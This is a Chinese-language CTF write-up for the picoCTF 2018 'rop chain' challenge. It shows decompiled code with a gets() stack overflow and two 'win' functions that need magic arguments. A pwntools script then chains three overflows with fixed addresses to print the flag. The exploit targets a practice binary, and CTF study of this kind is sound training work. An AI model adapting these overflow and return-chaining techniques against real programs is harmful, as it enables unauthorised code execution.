picoctf_2018_rop chain
题目链接:picoctf_2018_rop chain。
下载附件后,使用 IDA 反编译,定位到主要函数,如下。
int __cdecl main(int argc, const char **argv, const char **envp)
{
__gid_t v4; // [esp+Ch] [ebp-Ch]
setvbuf(_bss_start, 0, 2, 0);
v4 = getegid();
setresgid(v4, v4, v4);
vuln();
return 0;
}
vuln 函数如下。
char *vuln()
{
char s[24]; // [esp+0h] [ebp-18h] BYREF
printf("Enter your input> ");
return gets(s);
}
留意到程序中函数别的函数,如下。
int __cdecl flag(int a1)
{
char s[48]; // [esp+Ch] [ebp-3Ch] BYREF
FILE *stream; // [esp+3Ch] [ebp-Ch]
stream = fopen("flag.txt", "r");
if ( !stream )
{
puts(
"Flag File is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.");
exit(0);
}
fgets(s, 48, stream);
if ( win1 && win2 && a1 == 0xDEADBAAD )
return printf("%s", s);
if ( win1 && win2 )
return puts("Incorrect Argument. Remember, you can call other functions in between each win function!");
if ( win1 || win2 )
return puts("Nice Try! You're Getting There!");
return puts("You won't get the flag that easy..");
}
void win_function1()
{
win1 = 1;
}
int __cdecl win_function2(int a1)
{
int result; // eax
result = (unsigned __int8)win1;
if ( win1 && a1 == 0xBAAAAAAD )
{
win2 = 1;
}
else if ( win1 )
{
return puts("Wrong Argument. Try Again.");
}
else
{
return puts("Nope. Try a little bit harder.");
}
return result;
}
解题思路:
- 栈溢出,调用函数 win_function1。
- 栈溢出,调用函数 win_function2。
- 栈溢出,调用函数 flag。
解题脚本如下。
from pwn import *
from pwn import p32, p64, u32, u64
from settings import *
from modules import *
def pwn():
# .text:0804862B ; int __cdecl flag(int)
# .text:080485CB ; void win_function1()
# .text:080485D8 ; int __cdecl win_function2(int)
# .text:080484D0 _start proc near ; DATA XREF: LOAD:08047018↑o
sla('Enter your input> ', 0x1C * b'a' + \
p32(0x080485CB) + \
p32(0x080484D0))
sla('Enter your input> ', 0x1C * b'a' + \
p32(0x080485D8) + \
p32(0x080484D0) + \
p32(0xBAAAAAAD))
sla('Enter your input> ', 0x1C * b'a' + \
p32(0x0804862B) + \
p32(0x080484D0) + \
p32(0xDEADBAAD))
irt()
pwn()
浙公网安备 33010602011771号